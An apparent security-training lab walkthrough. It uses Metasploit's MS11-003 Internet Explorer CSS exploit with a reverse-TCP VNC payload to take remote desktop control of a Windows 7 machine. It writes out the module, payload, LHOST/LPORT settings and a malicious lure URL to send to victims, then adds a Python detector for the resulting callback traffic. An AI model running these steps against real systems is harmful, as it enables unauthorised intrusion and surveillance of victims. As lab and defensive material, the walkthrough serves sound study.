Exploiting Client-Side Vulnerabilities and Establishing a VNC Session using Metasploit
Task 01:- Launch Metasploit console.
- Start Kali Linux, open a terminal, type msfconsole and press Enter to launch the Metasploit console.
Tip:- Msfconsole can also be run from Application → Kali Linux → Top 10 Security tools → metasploit framework.
Tip:- In the Metasploit framework, all modules are Ruby classes.
- The Metasploit console is launched on the Kali Linux machine, as shown in the screenshot below.
- Now, search the Metasploit database for privilege escalation exploits: type search ms11 and press Enter. This command displays the available exploits in the Metasploit database.
Tip:- Msfconsole includes extensive regular-expression based search functionality. If you have a general idea of what you are looking for, you can search for it via “search”.
Task 02:- Using Browser Exploit for Windows.
- Type use exploit/windows/browser/ms11_003_ie_css_import and press Enter.
Tip:- This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused.
Task 03:- Setting Payload.
- Type set payload windows/vncinject/reverse_tcp and press Enter.
- To check the options available in this exploit, type show options and press Enter.
- In the following screenshot, we can see that LHOST is not set and LPORT is on the default port number. Now, we need to set LHOST and LPORT.
Tip:- If you have selected a specific module, you can issue the ‘show options’ command to display which settings are available and/or required for the specific module.
Task 04:- Setting LHOST and LPORT.
- Type set LHOST [attacker machine IP address i.e. kali linux IP address] and press Enter.
- To set local port, type set LPORT 443 and press Enter.
- Now, verify the options that have been set: type show options and press Enter. The Local Host (LHOST) and Local Port (LPORT) are now set.
Tip:- The ‘set’ command allows you to configure Framework options and parameters for the current module you are working with.
Task 05:- Running Exploit.
- Type exploit and press Enter to run the exploit. This command provides you with a Local IP URL, which can be sent to the victim’s machine through email or any other means of communication.
- Now, switch to the Windows 7 virtual machine and open Internet Explorer; then copy the Local IP URL, that is, http://192.168.1.102:8080/FkEF1aT, paste it in the address bar and press Enter.
- Once you have pressed Enter, Internet Explorer displays a blank screen.
Tip:- Windows client side attack using a browser vulnerability and privilege escalation via task scheduler exploit.
Task 06:- Remote view in Kali Linux.
- Switch to Kali Linux (attacker machine). You can see that a Remote Desktop window for the victim machine has opened automatically in the TightVNC window, as shown in the following figure.
- Minimise the TightVNC remote window, and observe in msfconsole that, without any authentication, we have successfully gained access to the victim machine.
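From the defender's side, the sequence in Tasks 05 and 06 leaves a recognizable network trace: a browser fetch from a bare-IP URL, followed seconds later by a connection from the same client to a different port on that host. The following is an added example, not part of the original lab, that flags this pattern in Python; the log format, the client addresses and the 60-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (assumed format, not from the original lab):
#   <ISO time> proxy <client> GET <url>
#   <ISO time> flow  <client> TCP <dst_ip>:<dst_port>
# Only the first URL and port 443 come from the lab; the rest is made up.
SAMPLE_LOG = """\
2024-01-10T10:00:01 proxy 192.168.1.105 GET http://192.168.1.102:8080/FkEF1aT
2024-01-10T10:00:04 flow 192.168.1.105 TCP 192.168.1.102:443
2024-01-10T10:01:00 proxy 192.168.1.106 GET http://intranet.example.local/index.html
2024-01-10T10:01:02 flow 192.168.1.106 TCP 203.0.113.10:443
2024-01-10T10:05:00 proxy 192.168.1.107 GET http://192.168.1.50:8080/status
2024-01-10T10:20:00 flow 192.168.1.107 TCP 192.168.1.50:443
"""

# URL whose host is a bare IPv4 literal, with an optional explicit port.
URL_RE = re.compile(r"^(https?)://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?(?:/|$)")
WINDOW = timedelta(seconds=60)  # assumed correlation window


def find_callbacks(log_text, window=WINDOW):
    """Return alerts for clients that fetch a page from a bare-IP URL and
    then open a TCP connection to a different port on that same host
    within `window`. Events are assumed to be in time order."""
    fetches = {}  # (client, server_ip) -> (time, web_port, url)
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip blank or malformed lines
        ts, source, client, _, detail = parts
        ts = datetime.fromisoformat(ts)
        if source == "proxy":
            m = URL_RE.match(detail)
            if m:
                port = int(m.group(3) or (443 if m.group(1) == "https" else 80))
                fetches[(client, m.group(2))] = (ts, port, detail)
        elif source == "flow":
            dst_ip, _, dst_port = detail.rpartition(":")
            prior = fetches.get((client, dst_ip))
            if (prior and int(dst_port) != prior[1]
                    and timedelta(0) <= ts - prior[0] <= window):
                alerts.append({"client": client, "server": dst_ip,
                               "url": prior[2], "callback_port": int(dst_port)})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(alert)
```

Only the first client is flagged: the second fetched from a hostname, and the third connected back well outside the correlation window.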
| Tool/Utility | Information Collected/Objectives Achieved |
|---|---|
| Metasploit Framework Console (msfconsole) | IP Address Range/target:- Windows 7 machine; Scan Result:- |